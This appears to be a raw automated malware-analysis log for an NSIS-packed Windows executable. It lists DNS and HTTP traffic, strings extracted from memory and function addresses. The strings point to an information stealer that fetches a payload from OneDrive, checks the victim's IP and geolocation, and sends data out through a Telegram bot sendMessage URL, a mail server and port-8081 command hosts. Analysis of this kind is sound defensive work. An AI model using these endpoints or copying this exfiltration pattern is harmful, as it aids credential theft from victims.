            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: api.onedrive.com
            Source: global trafficDNS traffic detected: DNS query: fa2ytg.dm.files.1drv.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: mail.foodex.com.pk
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 12 Nov 2024 06:37:04 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: ________.exe, 00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: ________.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
            Source: ________.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
            Source: ________.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
            Source: ________.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
            Source: ________.exe, 00000003.00000002.3975771250.0000000032EFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foodex.com.pk
            Source: ________.exe, 00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032EFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.foodex.com.pk
            Source: ________.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: ________.exeString found in binary or memory: http://ocsp.sectigo.com0
            Source: ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: ________.exe, 00000003.00000002.3954718526.00000000025B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/
            Source: ________.exe, 00000003.00000002.3954718526.00000000025F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/v1.0/shares/s
            Source: ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20a
            Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: ________.exe, 00000003.00000002.3975771250.0000000032F20000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: ________.exe, 00000003.00000002.3975771250.0000000032F1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: ________.exe, 00000003.00000003.1709008650.0000000002628000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fa2ytg.dm.files.1drv.com/
            Source: ________.exe, 00000003.00000003.1735612317.0000000002628000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fa2ytg.dm.files.1drv.com/oft
            Source: ________.exe, 00000003.00000003.1735612317.0000000002628000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fa2ytg.dm.files.1drv.com/y4mMPMXGbTpZA5YgHaTE31Fc-Wg6Iu9gpthjDJlQ5ie3dz395ZMCu5rd38cOpuGMXl4
            Source: ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fa2ytg.dm.files.1drv.com/y4m_K24I_IZwtc1os-c0UOoxdtzKrradsOM2iRZNEMhYqB_oUmwpewHC2hedgX3rXjZ
            Source: ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032DAE000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: ________.exe, 00000003.00000002.3975771250.0000000032DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: ________.exe, 00000003.00000002.3975771250.0000000032E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.68
            Source: ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032DDC000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.68$
            Source: ________.exeString found in binary or memory: https://sectigo.com/CPS0
            Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: ________.exe, 00000003.00000002.3975771250.0000000032F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: ________.exe, 00000003.00000002.3975771250.0000000032F42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/8ub
            Source: ________.exe, 00000003.00000002.3975771250.0000000032F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_004052D3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004052D3
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_0040335A
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,3_2_0040335A
            Source: C:\Users\user\Desktop\________.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_00404B101_2_00404B10
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_0040653F1_2_0040653F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_00404B103_2_00404B10
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0040653F3_2_0040653F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015D2CD3_2_0015D2CD
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_001553703_2_00155370
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015D5993_2_0015D599
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015C5C03_2_0015C5C0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_001577A03_2_001577A0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_001559683_2_00155968
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_001529E03_2_001529E0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015CA583_2_0015CA58
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015AA783_2_0015AA78
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015EC183_2_0015EC18
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015CD283_2_0015CD28
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_00157F183_2_00157F18
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015CFF73_2_0015CFF7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015C7883_2_0015C788
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015F8043_2_0015F804
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015EC0C3_2_0015EC0C
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_0015FC483_2_0015FC48
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_00153E093_2_00153E09
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D452903_2_32D45290
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D422883_2_32D42288
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D41BA83_2_32D41BA8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4E0683_2_32D4E068
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D495903_2_32D49590
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D429703_2_32D42970
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D49E803_2_32D49E80
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D452833_2_32D45283
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4FA783_2_32D4FA78
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D422783_2_32D42278
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4FA693_2_32D4FA69
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4F6103_2_32D4F610
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D48E083_2_32D48E08
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4F6203_2_32D4F620
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D41B973_2_32D41B97
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D497B03_2_32D497B0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4D7B83_2_32D4D7B8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4D3513_2_32D4D351
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4D3603_2_32D4D360
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4CF083_2_32D4CF08
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4C7373_2_32D4C737
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D40B303_2_32D40B30
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D40B203_2_32D40B20
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4E4C03_2_32D4E4C0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4E4B13_2_32D4E4B1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4E4BF3_2_32D4E4BF
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4E0593_2_32D4E059
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D400403_2_32D40040
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4DC103_2_32D4DC10
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D400063_2_32D40006
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4DC013_2_32D4DC01
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4F1C83_2_32D4F1C8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D48DF93_2_32D48DF9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4F1B93_2_32D4F1B9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4ED703_2_32D4ED70
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4ED603_2_32D4ED60
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4C9613_2_32D4C961
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4E9183_2_32D4E918
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_32D4E9083_2_32D4E908
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E981D03_2_35E981D0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E98FB03_2_35E98FB0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E97B783_2_35E97B78
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E900403_2_35E90040
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9C5E83_2_35E9C5E8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E915E83_2_35E915E8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E915F83_2_35E915F8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9E5C83_2_35E9E5C8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E95BD83_2_35E95BD8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9E5D83_2_35E9E5D8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9C5D83_2_35E9C5D8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9B3A83_2_35E9B3A8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E92BAF3_2_35E92BAF
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E98FA13_2_35E98FA1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E911A03_2_35E911A0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E92BA03_2_35E92BA0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E92BB03_2_35E92BB0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9F3883_2_35E9F388
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E957803_2_35E95780
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9D3873_2_35E9D387
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9D3983_2_35E9D398
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9B3983_2_35E9B398
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9119F3_2_35E9119F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E911903_2_35E91190
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E97B693_2_35E97B69
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9F3783_2_35E9F378
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E97B773_2_35E97B77
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E927493_2_35E92749
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9E1483_2_35E9E148
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E90D483_2_35E90D48
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9C1483_2_35E9C148
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9C1583_2_35E9C158
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E927583_2_35E92758
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E927573_2_35E92757
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E953283_2_35E95328
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9A5283_2_35E9A528
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E977203_2_35E97720
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E977223_2_35E97722
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9A5383_2_35E9A538
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9E1383_2_35E9E138
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9CF083_2_35E9CF08
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E923003_2_35E92300
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9AF073_2_35E9AF07
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9AF183_2_35E9AF18
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E994E23_2_35E994E2
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9EEE73_2_35E9EEE7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9EEF83_2_35E9EEF8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E908F03_2_35E908F0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E922F03_2_35E922F0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9CEF73_2_35E9CEF7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9BCC83_2_35E9BCC8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E972C83_2_35E972C8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E980C83_2_35E980C8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E94ED03_2_35E94ED0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E91EA83_2_35E91EA8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9FCA83_2_35E9FCA8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E938A83_2_35E938A8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9DCA73_2_35E9DCA7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E938B83_2_35E938B8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9DCB83_2_35E9DCB8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E972B83_2_35E972B8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9BCB73_2_35E9BCB7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E964883_2_35E96488
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E904983_2_35E90498
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E91E983_2_35E91E98
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9FC983_2_35E9FC98
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9EA683_2_35E9EA68
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E934603_2_35E93460
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9CA673_2_35E9CA67
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9CA783_2_35E9CA78
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E94A783_2_35E94A78
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E96E703_2_35E96E70
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E91A413_2_35E91A41
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E91A503_2_35E91A50
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E934503_2_35E93450
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9EA573_2_35E9EA57
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9B8293_2_35E9B829
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9D8283_2_35E9D828
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E960213_2_35E96021
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E946203_2_35E94620
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E900273_2_35E90027
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9B8383_2_35E9B838
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E960303_2_35E96030
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9F8093_2_35E9F809
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E96A073_2_35E96A07
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9D8193_2_35E9D819
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E96A183_2_35E96A18
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E9F8183_2_35E9F818
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35E946103_2_35E94610
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F061E83_2_35F061E8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F05B483_2_35F05B48
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F032383_2_35F03238
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F00DF03_2_35F00DF0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F08CF03_2_35F08CF0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F01FF83_2_35F01FF8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0B7F83_2_35F0B7F8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F074F83_2_35F074F8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F048F93_2_35F048F9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F09FFF3_2_35F09FFF
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0CFE03_2_35F0CFE0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F00DE03_2_35F00DE0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F08CE13_2_35F08CE1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F03FE83_2_35F03FE8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0FAE83_2_35F0FAE8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F01FE83_2_35F01FE8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0B7E83_2_35F0B7E8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0E2EF3_2_35F0E2EF
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F004D03_2_35F004D0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F079D03_2_35F079D0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0CFD03_2_35F0CFD0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0FAD73_2_35F0FAD7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0A4D83_2_35F0A4D8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F03FD83_2_35F03FD8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F061D83_2_35F061D8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0BCC03_2_35F0BCC0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F004C03_2_35F004C0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F079C03_2_35F079C0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F036C83_2_35F036C8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0E7C83_2_35F0E7C8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0A4C83_2_35F0A4C8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F066B03_2_35F066B0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0BCB23_2_35F0BCB2
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F056B83_2_35F056B8
